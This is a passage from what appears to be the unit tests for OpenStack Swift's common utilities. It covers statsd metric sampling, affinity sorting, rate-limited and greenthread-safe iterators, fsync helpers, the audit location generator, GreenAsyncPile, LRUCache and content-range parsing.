statsd_client._open_socket = lambda *_: mock_socket
statsd_client.random = lambda: 0.50001
logger.increment('tribbles', sample_rate=0.5)
self.assertEqual(len(mock_socket.sent), 0)
statsd_client.random = lambda: 0.49999
logger.increment('tribbles', sample_rate=0.5)
self.assertEqual(len(mock_socket.sent), 1)
payload = mock_socket.sent[0][0]
self.assertTrue(payload.endswith(b"|@0.5"))
def test_sample_rates_with_sample_rate_factor(self):
logger = utils.get_logger({
'log_statsd_host': 'some.host.com',
'log_statsd_default_sample_rate': '0.82',
'log_statsd_sample_rate_factor': '0.91',
})
effective_sample_rate = 0.82 * 0.91
mock_socket = MockUdpSocket()
# encapsulation? what's that?
statsd_client = logger.logger.statsd_client
self.assertTrue(statsd_client.random is random.random)
statsd_client._open_socket = lambda *_: mock_socket
statsd_client.random = lambda: effective_sample_rate + 0.001
logger.increment('tribbles')
self.assertEqual(len(mock_socket.sent), 0)
statsd_client.random = lambda: effective_sample_rate - 0.001
logger.increment('tribbles')
self.assertEqual(len(mock_socket.sent), 1)
payload = mock_socket.sent[0][0]
suffix = "|@%s" % effective_sample_rate
if six.PY3:
suffix = suffix.encode('utf-8')
self.assertTrue(payload.endswith(suffix), payload)
effective_sample_rate = 0.587 * 0.91
statsd_client.random = lambda: effective_sample_rate - 0.001
logger.increment('tribbles', sample_rate=0.587)
self.assertEqual(len(mock_socket.sent), 2)
payload = mock_socket.sent[1][0]
suffix = "|@%s" % effective_sample_rate
if six.PY3:
suffix = suffix.encode('utf-8')
self.assertTrue(payload.endswith(suffix), payload)
def test_timing_stats(self):
class MockController(object):
def __init__(self, status):
self.status = status
self.logger = self
self.args = ()
self.called = 'UNKNOWN'
def timing_since(self, *args):
self.called = 'timing'
self.args = args
@utils.timing_stats()
def METHOD(controller):
return Response(status=controller.status)
mock_controller = MockController(200)
METHOD(mock_controller)
self.assertEqual(mock_controller.called, 'timing')
self.assertEqual(len(mock_controller.args), 2)
self.assertEqual(mock_controller.args[0], 'METHOD.timing')
self.assertTrue(mock_controller.args[1] > 0)
mock_controller = MockController(404)
METHOD(mock_controller)
self.assertEqual(len(mock_controller.args), 2)
self.assertEqual(mock_controller.called, 'timing')
self.assertEqual(mock_controller.args[0], 'METHOD.timing')
self.assertTrue(mock_controller.args[1] > 0)
mock_controller = MockController(412)
METHOD(mock_controller)
self.assertEqual(len(mock_controller.args), 2)
self.assertEqual(mock_controller.called, 'timing')
self.assertEqual(mock_controller.args[0], 'METHOD.timing')
self.assertTrue(mock_controller.args[1] > 0)
mock_controller = MockController(416)
METHOD(mock_controller)
self.assertEqual(len(mock_controller.args), 2)
self.assertEqual(mock_controller.called, 'timing')
self.assertEqual(mock_controller.args[0], 'METHOD.timing')
self.assertTrue(mock_controller.args[1] > 0)
mock_controller = MockController(401)
METHOD(mock_controller)
self.assertEqual(len(mock_controller.args), 2)
self.assertEqual(mock_controller.called, 'timing')
self.assertEqual(mock_controller.args[0], 'METHOD.errors.timing')
self.assertTrue(mock_controller.args[1] > 0)
class UnsafeXrange(object):
"""
Like xrange(limit), but with extra context switching to screw things up.
"""
def __init__(self, upper_bound):
self.current = 0
self.concurrent_calls = 0
self.upper_bound = upper_bound
self.concurrent_call = False
def __iter__(self):
return self
def next(self):
if self.concurrent_calls > 0:
self.concurrent_call = True
self.concurrent_calls += 1
try:
if self.current >= self.upper_bound:
raise StopIteration
else:
val = self.current
self.current += 1
eventlet.sleep() # yield control
return val
finally:
self.concurrent_calls -= 1
__next__ = next
class TestAffinityKeyFunction(unittest.TestCase):
def setUp(self):
self.nodes = [dict(id=0, region=1, zone=1),
dict(id=1, region=1, zone=2),
dict(id=2, region=2, zone=1),
dict(id=3, region=2, zone=2),
dict(id=4, region=3, zone=1),
dict(id=5, region=3, zone=2),
dict(id=6, region=4, zone=0),
dict(id=7, region=4, zone=1)]
def test_single_region(self):
keyfn = utils.affinity_key_function("r3=1")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([4, 5, 0, 1, 2, 3, 6, 7], ids)
def test_bogus_value(self):
self.assertRaises(ValueError,
utils.affinity_key_function, "r3")
self.assertRaises(ValueError,
utils.affinity_key_function, "r3=elephant")
def test_empty_value(self):
# Empty's okay, it just means no preference
keyfn = utils.affinity_key_function("")
self.assertTrue(callable(keyfn))
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7], ids)
def test_all_whitespace_value(self):
# Empty's okay, it just means no preference
keyfn = utils.affinity_key_function(" \n")
self.assertTrue(callable(keyfn))
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7], ids)
def test_with_zone_zero(self):
keyfn = utils.affinity_key_function("r4z0=1")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([6, 0, 1, 2, 3, 4, 5, 7], ids)
def test_multiple(self):
keyfn = utils.affinity_key_function("r1=100, r4=200, r3z1=1")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([4, 0, 1, 6, 7, 2, 3, 5], ids)
def test_more_specific_after_less_specific(self):
keyfn = utils.affinity_key_function("r2=100, r2z2=50")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([3, 2, 0, 1, 4, 5, 6, 7], ids)
class TestAffinityLocalityPredicate(unittest.TestCase):
def setUp(self):
self.nodes = [dict(id=0, region=1, zone=1),
dict(id=1, region=1, zone=2),
dict(id=2, region=2, zone=1),
dict(id=3, region=2, zone=2),
dict(id=4, region=3, zone=1),
dict(id=5, region=3, zone=2),
dict(id=6, region=4, zone=0),
dict(id=7, region=4, zone=1)]
def test_empty(self):
pred = utils.affinity_locality_predicate('')
self.assertTrue(pred is None)
def test_region(self):
pred = utils.affinity_locality_predicate('r1')
self.assertTrue(callable(pred))
ids = [n['id'] for n in self.nodes if pred(n)]
self.assertEqual([0, 1], ids)
def test_zone(self):
pred = utils.affinity_locality_predicate('r1z1')
self.assertTrue(callable(pred))
ids = [n['id'] for n in self.nodes if pred(n)]
self.assertEqual([0], ids)
def test_multiple(self):
pred = utils.affinity_locality_predicate('r1, r3, r4z0')
self.assertTrue(callable(pred))
ids = [n['id'] for n in self.nodes if pred(n)]
self.assertEqual([0, 1, 4, 5, 6], ids)
def test_invalid(self):
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'falafel')
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'r8zQ')
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'r2d2')
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'r1z1=1')
class TestRateLimitedIterator(unittest.TestCase):
def run_under_pseudo_time(
self, func, *args, **kwargs):
curr_time = [42.0]
def my_time():
curr_time[0] += 0.001
return curr_time[0]
def my_sleep(duration):
curr_time[0] += 0.001
curr_time[0] += duration
with patch('time.time', my_time), \
patch('eventlet.sleep', my_sleep):
return func(*args, **kwargs)
def test_rate_limiting(self):
def testfunc():
limited_iterator = utils.RateLimitedIterator(range(9999), 100)
got = []
started_at = time.time()
try:
while time.time() - started_at < 0.1:
got.append(next(limited_iterator))
except StopIteration:
pass
return got
got = self.run_under_pseudo_time(testfunc)
# it's 11, not 10, because ratelimiting doesn't apply to the very
# first element.
self.assertEqual(len(got), 11)
def test_rate_limiting_sometimes(self):
def testfunc():
limited_iterator = utils.RateLimitedIterator(
range(9999), 100,
ratelimit_if=lambda item: item % 23 != 0)
got = []
started_at = time.time()
try:
while time.time() - started_at < 0.5:
got.append(next(limited_iterator))
except StopIteration:
pass
return got
got = self.run_under_pseudo_time(testfunc)
# we'd get 51 without the ratelimit_if, but because 0, 23 and 46
# weren't subject to ratelimiting, we get 54 instead
self.assertEqual(len(got), 54)
def test_limit_after(self):
def testfunc():
limited_iterator = utils.RateLimitedIterator(
range(9999), 100, limit_after=5)
got = []
started_at = time.time()
try:
while time.time() - started_at < 0.1:
got.append(next(limited_iterator))
except StopIteration:
pass
return got
got = self.run_under_pseudo_time(testfunc)
# it's 16, not 15, because ratelimiting doesn't apply to the very
# first element.
self.assertEqual(len(got), 16)
class TestGreenthreadSafeIterator(unittest.TestCase):
def increment(self, iterable):
plus_ones = []
for n in iterable:
plus_ones.append(n + 1)
return plus_ones
def test_setup_works(self):
# it should work without concurrent access
self.assertEqual([0, 1, 2, 3], list(UnsafeXrange(4)))
iterable = UnsafeXrange(10)
pile = eventlet.GreenPile(2)
for _ in range(2):
pile.spawn(self.increment, iterable)
sorted([resp for resp in pile])
self.assertTrue(
iterable.concurrent_call, 'test setup is insufficiently crazy')
def test_access_is_serialized(self):
pile = eventlet.GreenPile(2)
unsafe_iterable = UnsafeXrange(10)
iterable = utils.GreenthreadSafeIterator(unsafe_iterable)
for _ in range(2):
pile.spawn(self.increment, iterable)
response = sorted(sum([resp for resp in pile], []))
self.assertEqual(list(range(1, 11)), response)
self.assertTrue(
not unsafe_iterable.concurrent_call, 'concurrent call occurred')
class TestStatsdLoggingDelegation(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.bind(('localhost', 0))
self.port = self.sock.getsockname()[1]
self.queue = Queue()
self.reader_thread = threading.Thread(target=self.statsd_reader)
self.reader_thread.setDaemon(1)
self.reader_thread.start()
def tearDown(self):
# The "no-op when disabled" test doesn't set up a real logger, so
# create one here so we can tell the reader thread to stop.
if not getattr(self, 'logger', None):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
}, 'some-name')
self.logger.increment('STOP')
self.reader_thread.join(timeout=4)
self.sock.close()
del self.logger
def statsd_reader(self):
while True:
try:
payload = self.sock.recv(4096)
if payload and b'STOP' in payload:
return 42
self.queue.put(payload)
except Exception as e:
sys.stderr.write('statsd_reader thread: %r' % (e,))
break
def _send_and_get(self, sender_fn, *args, **kwargs):
"""
Because the client library may not actually send a packet with
sample_rate < 1, we keep trying until we get one through.
"""
got = None
while not got:
sender_fn(*args, **kwargs)
try:
got = self.queue.get(timeout=0.5)
except Empty:
pass
return got
def assertStat(self, expected, sender_fn, *args, **kwargs):
got = self._send_and_get(sender_fn, *args, **kwargs)
if six.PY3:
got = got.decode('utf-8')
return self.assertEqual(expected, got)
def assertStatMatches(self, expected_regexp, sender_fn, *args, **kwargs):
got = self._send_and_get(sender_fn, *args, **kwargs)
if six.PY3:
got = got.decode('utf-8')
return self.assertTrue(re.search(expected_regexp, got),
[got, expected_regexp])
def test_methods_are_no_ops_when_not_enabled(self):
logger = utils.get_logger({
# No "log_statsd_host" means "disabled"
'log_statsd_port': str(self.port),
}, 'some-name')
# Delegate methods are no-ops
self.assertIsNone(logger.update_stats('foo', 88))
self.assertIsNone(logger.update_stats('foo', 88, 0.57))
self.assertIsNone(logger.update_stats('foo', 88,
sample_rate=0.61))
self.assertIsNone(logger.increment('foo'))
self.assertIsNone(logger.increment('foo', 0.57))
self.assertIsNone(logger.increment('foo', sample_rate=0.61))
self.assertIsNone(logger.decrement('foo'))
self.assertIsNone(logger.decrement('foo', 0.57))
self.assertIsNone(logger.decrement('foo', sample_rate=0.61))
self.assertIsNone(logger.timing('foo', 88.048))
self.assertIsNone(logger.timing('foo', 88.57, 0.34))
self.assertIsNone(logger.timing('foo', 88.998, sample_rate=0.82))
self.assertIsNone(logger.timing_since('foo', 8938))
self.assertIsNone(logger.timing_since('foo', 8948, 0.57))
self.assertIsNone(logger.timing_since('foo', 849398,
sample_rate=0.61))
# Now, the queue should be empty (no UDP packets sent)
self.assertRaises(Empty, self.queue.get_nowait)
def test_delegate_methods_with_no_default_sample_rate(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
}, 'some-name')
self.assertStat('some-name.some.counter:1|c', self.logger.increment,
'some.counter')
self.assertStat('some-name.some.counter:-1|c', self.logger.decrement,
'some.counter')
self.assertStat('some-name.some.operation:4900.0|ms',
self.logger.timing, 'some.operation', 4.9 * 1000)
self.assertStatMatches('some-name\.another\.operation:\d+\.\d+\|ms',
self.logger.timing_since, 'another.operation',
time.time())
self.assertStat('some-name.another.counter:42|c',
self.logger.update_stats, 'another.counter', 42)
# Each call can override the sample_rate (also, bonus prefix test)
self.logger.set_statsd_prefix('pfx')
self.assertStat('pfx.some.counter:1|c|@0.972', self.logger.increment,
'some.counter', sample_rate=0.972)
self.assertStat('pfx.some.counter:-1|c|@0.972', self.logger.decrement,
'some.counter', sample_rate=0.972)
self.assertStat('pfx.some.operation:4900.0|ms|@0.972',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.972)
self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.972',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.972)
self.assertStat('pfx.another.counter:3|c|@0.972',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.972)
# Can override sample_rate with non-keyword arg
self.logger.set_statsd_prefix('')
self.assertStat('some.counter:1|c|@0.939', self.logger.increment,
'some.counter', 0.939)
self.assertStat('some.counter:-1|c|@0.939', self.logger.decrement,
'some.counter', 0.939)
self.assertStat('some.operation:4900.0|ms|@0.939',
self.logger.timing, 'some.operation',
4.9 * 1000, 0.939)
self.assertStatMatches('another\.op:\d+\.\d+\|ms|@0.939',
self.logger.timing_since, 'another.op',
time.time(), 0.939)
self.assertStat('another.counter:3|c|@0.939',
self.logger.update_stats, 'another.counter', 3, 0.939)
def test_delegate_methods_with_default_sample_rate(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
'log_statsd_default_sample_rate': '0.93',
}, 'pfx')
self.assertStat('pfx.some.counter:1|c|@0.93', self.logger.increment,
'some.counter')
self.assertStat('pfx.some.counter:-1|c|@0.93', self.logger.decrement,
'some.counter')
self.assertStat('pfx.some.operation:4760.0|ms|@0.93',
self.logger.timing, 'some.operation', 4.76 * 1000)
self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.93',
self.logger.timing_since, 'another.op',
time.time())
self.assertStat('pfx.another.counter:3|c|@0.93',
self.logger.update_stats, 'another.counter', 3)
# Each call can override the sample_rate
self.assertStat('pfx.some.counter:1|c|@0.9912', self.logger.increment,
'some.counter', sample_rate=0.9912)
self.assertStat('pfx.some.counter:-1|c|@0.9912', self.logger.decrement,
'some.counter', sample_rate=0.9912)
self.assertStat('pfx.some.operation:4900.0|ms|@0.9912',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.9912)
self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.9912',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.9912)
self.assertStat('pfx.another.counter:3|c|@0.9912',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.9912)
# Can override sample_rate with non-keyword arg
self.logger.set_statsd_prefix('')
self.assertStat('some.counter:1|c|@0.987654', self.logger.increment,
'some.counter', 0.987654)
self.assertStat('some.counter:-1|c|@0.987654', self.logger.decrement,
'some.counter', 0.987654)
self.assertStat('some.operation:4900.0|ms|@0.987654',
self.logger.timing, 'some.operation',
4.9 * 1000, 0.987654)
self.assertStatMatches('another\.op:\d+\.\d+\|ms|@0.987654',
self.logger.timing_since, 'another.op',
time.time(), 0.987654)
self.assertStat('another.counter:3|c|@0.987654',
self.logger.update_stats, 'another.counter',
3, 0.987654)
def test_delegate_methods_with_metric_prefix(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
'log_statsd_metric_prefix': 'alpha.beta',
}, 'pfx')
self.assertStat('alpha.beta.pfx.some.counter:1|c',
self.logger.increment, 'some.counter')
self.assertStat('alpha.beta.pfx.some.counter:-1|c',
self.logger.decrement, 'some.counter')
self.assertStat('alpha.beta.pfx.some.operation:4760.0|ms',
self.logger.timing, 'some.operation', 4.76 * 1000)
self.assertStatMatches(
'alpha\.beta\.pfx\.another\.op:\d+\.\d+\|ms',
self.logger.timing_since, 'another.op', time.time())
self.assertStat('alpha.beta.pfx.another.counter:3|c',
self.logger.update_stats, 'another.counter', 3)
self.logger.set_statsd_prefix('')
self.assertStat('alpha.beta.some.counter:1|c|@0.9912',
self.logger.increment, 'some.counter',
sample_rate=0.9912)
self.assertStat('alpha.beta.some.counter:-1|c|@0.9912',
self.logger.decrement, 'some.counter', 0.9912)
self.assertStat('alpha.beta.some.operation:4900.0|ms|@0.9912',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.9912)
self.assertStatMatches('alpha\.beta\.another\.op:\d+\.\d+\|ms|@0.9912',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.9912)
self.assertStat('alpha.beta.another.counter:3|c|@0.9912',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.9912)
def test_get_valid_utf8_str(self):
unicode_sample = u'\uc77c\uc601'
valid_utf8_str = unicode_sample.encode('utf-8')
invalid_utf8_str = unicode_sample.encode('utf-8')[::-1]
self.assertEqual(valid_utf8_str,
utils.get_valid_utf8_str(valid_utf8_str))
self.assertEqual(valid_utf8_str,
utils.get_valid_utf8_str(unicode_sample))
self.assertEqual(b'\xef\xbf\xbd\xef\xbf\xbd\xec\xbc\x9d\xef\xbf\xbd',
utils.get_valid_utf8_str(invalid_utf8_str))
@reset_logger_state
def test_thread_locals(self):
logger = utils.get_logger(None)
# test the setter
logger.thread_locals = ('id', 'ip')
self.assertEqual(logger.thread_locals, ('id', 'ip'))
# reset
logger.thread_locals = (None, None)
self.assertEqual(logger.thread_locals, (None, None))
logger.txn_id = '1234'
logger.client_ip = '1.2.3.4'
self.assertEqual(logger.thread_locals, ('1234', '1.2.3.4'))
logger.txn_id = '5678'
logger.client_ip = '5.6.7.8'
self.assertEqual(logger.thread_locals, ('5678', '5.6.7.8'))
def test_no_fdatasync(self):
called = []
class NoFdatasync(object):
pass
def fsync(fd):
called.append(fd)
with patch('swift.common.utils.os', NoFdatasync()):
with patch('swift.common.utils.fsync', fsync):
utils.fdatasync(12345)
self.assertEqual(called, [12345])
def test_yes_fdatasync(self):
called = []
class YesFdatasync(object):
def fdatasync(self, fd):
called.append(fd)
with patch('swift.common.utils.os', YesFdatasync()):
utils.fdatasync(12345)
self.assertEqual(called, [12345])
def test_fsync_bad_fullsync(self):
class FCNTL(object):
F_FULLSYNC = 123
def fcntl(self, fd, op):
raise IOError(18)
with patch('swift.common.utils.fcntl', FCNTL()):
self.assertRaises(OSError, lambda: utils.fsync(12345))
def test_fsync_f_fullsync(self):
called = []
class FCNTL(object):
F_FULLSYNC = 123
def fcntl(self, fd, op):
called[:] = [fd, op]
return 0
with patch('swift.common.utils.fcntl', FCNTL()):
utils.fsync(12345)
self.assertEqual(called, [12345, 123])
def test_fsync_no_fullsync(self):
called = []
class FCNTL(object):
pass
def fsync(fd):
called.append(fd)
with patch('swift.common.utils.fcntl', FCNTL()):
with patch('os.fsync', fsync):
utils.fsync(12345)
self.assertEqual(called, [12345])
class TestAuditLocationGenerator(unittest.TestCase):
def test_drive_tree_access(self):
orig_listdir = utils.listdir
def _mock_utils_listdir(path):
if 'bad_part' in path:
raise OSError(errno.EACCES)
elif 'bad_suffix' in path:
raise OSError(errno.EACCES)
elif 'bad_hash' in path:
raise OSError(errno.EACCES)
else:
return orig_listdir(path)
# Check Raise on Bad partition
tmpdir = mkdtemp()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
obj_path = os.path.join(data, "bad_part")
with open(obj_path, "w"):
pass
part1 = os.path.join(data, "partition1")
os.makedirs(part1)
part2 = os.path.join(data, "partition2")
os.makedirs(part2)
with patch('swift.common.utils.listdir', _mock_utils_listdir):
audit = lambda: list(utils.audit_location_generator(
tmpdir, "data", mount_check=False))
self.assertRaises(OSError, audit)
rmtree(tmpdir)
# Check Raise on Bad Suffix
tmpdir = mkdtemp()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
part1 = os.path.join(data, "partition1")
os.makedirs(part1)
part2 = os.path.join(data, "partition2")
os.makedirs(part2)
obj_path = os.path.join(part1, "bad_suffix")
with open(obj_path, 'w'):
pass
suffix = os.path.join(part2, "suffix")
os.makedirs(suffix)
with patch('swift.common.utils.listdir', _mock_utils_listdir):
audit = lambda: list(utils.audit_location_generator(
tmpdir, "data", mount_check=False))
self.assertRaises(OSError, audit)
rmtree(tmpdir)
# Check Raise on Bad Hash
tmpdir = mkdtemp()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
part1 = os.path.join(data, "partition1")
os.makedirs(part1)
suffix = os.path.join(part1, "suffix")
os.makedirs(suffix)
hash1 = os.path.join(suffix, "hash1")
os.makedirs(hash1)
obj_path = os.path.join(suffix, "bad_hash")
with open(obj_path, 'w'):
pass
with patch('swift.common.utils.listdir', _mock_utils_listdir):
audit = lambda: list(utils.audit_location_generator(
tmpdir, "data", mount_check=False))
self.assertRaises(OSError, audit)
rmtree(tmpdir)
def test_non_dir_drive(self):
with temptree([]) as tmpdir:
logger = FakeLogger()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
# Create a file, that represents a non-dir drive
open(os.path.join(tmpdir, 'asdf'), 'w')
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=False, logger=logger
)
self.assertEqual(list(locations), [])
self.assertEqual(1, len(logger.get_lines_for_level('warning')))
# Test without the logger
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=False
)
self.assertEqual(list(locations), [])
def test_mount_check_drive(self):
with temptree([]) as tmpdir:
logger = FakeLogger()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
# Create a file, that represents a non-dir drive
open(os.path.join(tmpdir, 'asdf'), 'w')
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=True, logger=logger
)
self.assertEqual(list(locations), [])
self.assertEqual(2, len(logger.get_lines_for_level('warning')))
# Test without the logger
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=True
)
self.assertEqual(list(locations), [])
def test_non_dir_contents(self):
with temptree([]) as tmpdir:
logger = FakeLogger()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
with open(os.path.join(data, "partition1"), "w"):
pass
partition = os.path.join(data, "partition2")
os.makedirs(partition)
with open(os.path.join(partition, "suffix1"), "w"):
pass
suffix = os.path.join(partition, "suffix2")
os.makedirs(suffix)
with open(os.path.join(suffix, "hash1"), "w"):
pass
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=False, logger=logger
)
self.assertEqual(list(locations), [])
def test_find_objects(self):
with temptree([]) as tmpdir:
expected_objs = list()
logger = FakeLogger()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
# Create a file, that represents a non-dir drive
open(os.path.join(tmpdir, 'asdf'), 'w')
partition = os.path.join(data, "partition1")
os.makedirs(partition)
suffix = os.path.join(partition, "suffix")
os.makedirs(suffix)
hash_path = os.path.join(suffix, "hash")
os.makedirs(hash_path)
obj_path = os.path.join(hash_path, "obj1.db")
with open(obj_path, "w"):
pass
expected_objs.append((obj_path, 'drive', 'partition1'))
partition = os.path.join(data, "partition2")
os.makedirs(partition)
suffix = os.path.join(partition, "suffix2")
os.makedirs(suffix)
hash_path = os.path.join(suffix, "hash2")
os.makedirs(hash_path)
obj_path = os.path.join(hash_path, "obj2.db")
with open(obj_path, "w"):
pass
expected_objs.append((obj_path, 'drive', 'partition2'))
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=False, logger=logger
)
got_objs = list(locations)
self.assertEqual(len(got_objs), len(expected_objs))
self.assertEqual(sorted(got_objs), sorted(expected_objs))
self.assertEqual(1, len(logger.get_lines_for_level('warning')))
def test_ignore_metadata(self):
with temptree([]) as tmpdir:
logger = FakeLogger()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
partition = os.path.join(data, "partition2")
os.makedirs(partition)
suffix = os.path.join(partition, "suffix2")
os.makedirs(suffix)
hash_path = os.path.join(suffix, "hash2")
os.makedirs(hash_path)
obj_path = os.path.join(hash_path, "obj1.dat")
with open(obj_path, "w"):
pass
meta_path = os.path.join(hash_path, "obj1.meta")
with open(meta_path, "w"):
pass
locations = utils.audit_location_generator(
tmpdir, "data", ".dat", mount_check=False, logger=logger
)
self.assertEqual(list(locations),
[(obj_path, "drive", "partition2")])
class TestGreenAsyncPile(unittest.TestCase):
def test_runs_everything(self):
def run_test():
tests_ran[0] += 1
return tests_ran[0]
tests_ran = [0]
pile = utils.GreenAsyncPile(3)
for x in range(3):
pile.spawn(run_test)
self.assertEqual(sorted(x for x in pile), [1, 2, 3])
def test_is_asynchronous(self):
def run_test(index):
events[index].wait()
return index
pile = utils.GreenAsyncPile(3)
for order in ((1, 2, 0), (0, 1, 2), (2, 1, 0), (0, 2, 1)):
events = [eventlet.event.Event(), eventlet.event.Event(),
eventlet.event.Event()]
for x in range(3):
pile.spawn(run_test, x)
for x in order:
events[x].send()
self.assertEqual(next(pile), x)
def test_next_when_empty(self):
def run_test():
pass
pile = utils.GreenAsyncPile(3)
pile.spawn(run_test)
self.assertEqual(next(pile), None)
self.assertRaises(StopIteration, lambda: next(pile))
def test_waitall_timeout_timesout(self):
def run_test(sleep_duration):
eventlet.sleep(sleep_duration)
completed[0] += 1
return sleep_duration
completed = [0]
pile = utils.GreenAsyncPile(3)
pile.spawn(run_test, 0.1)
pile.spawn(run_test, 1.0)
self.assertEqual(pile.waitall(0.5), [0.1])
self.assertEqual(completed[0], 1)
def test_waitall_timeout_completes(self):
def run_test(sleep_duration):
eventlet.sleep(sleep_duration)
completed[0] += 1
return sleep_duration
completed = [0]
pile = utils.GreenAsyncPile(3)
pile.spawn(run_test, 0.1)
pile.spawn(run_test, 0.1)
self.assertEqual(pile.waitall(0.5), [0.1, 0.1])
self.assertEqual(completed[0], 2)
def test_waitfirst_only_returns_first(self):
def run_test(name):
eventlet.sleep(0)
completed.append(name)
return name
completed = []
pile = utils.GreenAsyncPile(3)
pile.spawn(run_test, 'first')
pile.spawn(run_test, 'second')
pile.spawn(run_test, 'third')
self.assertEqual(pile.waitfirst(0.5), completed[0])
# 3 still completed, but only the first was returned.
self.assertEqual(3, len(completed))
def test_wait_with_firstn(self):
def run_test(name):
eventlet.sleep(0)
completed.append(name)
return name
for first_n in [None] + list(range(6)):
completed = []
pile = utils.GreenAsyncPile(10)
for i in range(10):
pile.spawn(run_test, i)
actual = pile._wait(1, first_n)
expected_n = first_n if first_n else 10
self.assertEqual(completed[:expected_n], actual)
self.assertEqual(10, len(completed))
def test_pending(self):
pile = utils.GreenAsyncPile(3)
self.assertEqual(0, pile._pending)
for repeats in range(2):
# repeat to verify that pending will go again up after going down
for i in range(4):
pile.spawn(lambda: i)
self.assertEqual(4, pile._pending)
for i in range(3, -1, -1):
next(pile)
self.assertEqual(i, pile._pending)
# sanity check - the pile is empty
self.assertRaises(StopIteration, pile.next)
# pending remains 0
self.assertEqual(0, pile._pending)
class TestLRUCache(unittest.TestCase):
def test_maxsize(self):
@utils.LRUCache(maxsize=10)
def f(*args):
return math.sqrt(*args)
_orig_math_sqrt = math.sqrt
# setup cache [0-10)
for i in range(10):
self.assertEqual(math.sqrt(i), f(i))
self.assertEqual(f.size(), 10)
# validate cache [0-10)
with patch('math.sqrt'):
for i in range(10):
self.assertEqual(_orig_math_sqrt(i), f(i))
self.assertEqual(f.size(), 10)
# update cache [10-20)
for i in range(10, 20):
self.assertEqual(math.sqrt(i), f(i))
# cache size is fixed
self.assertEqual(f.size(), 10)
# validate cache [10-20)
with patch('math.sqrt'):
for i in range(10, 20):
self.assertEqual(_orig_math_sqrt(i), f(i))
# validate un-cached [0-10)
with patch('math.sqrt', new=None):
for i in range(10):
self.assertRaises(TypeError, f, i)
# cache unchanged
self.assertEqual(f.size(), 10)
with patch('math.sqrt'):
for i in range(10, 20):
self.assertEqual(_orig_math_sqrt(i), f(i))
self.assertEqual(f.size(), 10)
def test_maxtime(self):
@utils.LRUCache(maxtime=30)
def f(*args):
return math.sqrt(*args)
self.assertEqual(30, f.maxtime)
_orig_math_sqrt = math.sqrt
now = time.time()
the_future = now + 31
# setup cache [0-10)
with patch('time.time', lambda: now):
for i in range(10):
self.assertEqual(math.sqrt(i), f(i))
self.assertEqual(f.size(), 10)
# validate cache [0-10)
with patch('math.sqrt'):
for i in range(10):
self.assertEqual(_orig_math_sqrt(i), f(i))
self.assertEqual(f.size(), 10)
# validate expired [0-10)
with patch('math.sqrt', new=None):
with patch('time.time', lambda: the_future):
for i in range(10):
self.assertRaises(TypeError, f, i)
# validate repopulates [0-10)
with patch('time.time', lambda: the_future):
for i in range(10):
self.assertEqual(math.sqrt(i), f(i))
# reuses cache space
self.assertEqual(f.size(), 10)
def test_set_maxtime(self):
@utils.LRUCache(maxtime=30)
def f(*args):
return math.sqrt(*args)
self.assertEqual(30, f.maxtime)
self.assertEqual(2, f(4))
self.assertEqual(1, f.size())
# expire everything
f.maxtime = -1
# validate un-cached [0-10)
with patch('math.sqrt', new=None):
self.assertRaises(TypeError, f, 4)
def test_set_maxsize(self):
@utils.LRUCache(maxsize=10)
def f(*args):
return math.sqrt(*args)
for i in range(12):
f(i)
self.assertEqual(f.size(), 10)
f.maxsize = 4
for i in range(12):
f(i)
self.assertEqual(f.size(), 4)
class TestParseContentRange(unittest.TestCase):
def test_good(self):
start, end, total = utils.parse_content_range("bytes 100-200/300")
self.assertEqual(start, 100)
self.assertEqual(end, 200)
self.assertEqual(total, 300)
def test_bad(self):
self.assertRaises(ValueError, utils.parse_content_range,
"100-300/500")
self.assertRaises(ValueError, utils.parse_content_range,
"bytes 100-200/aardvark")
self.assertRaises(ValueError, utils.parse_content_range,
"bytes bulbous-bouffant/4994801")
class TestParseContentDisposition(unittest.TestCase):
def test_basic_content_type(self):
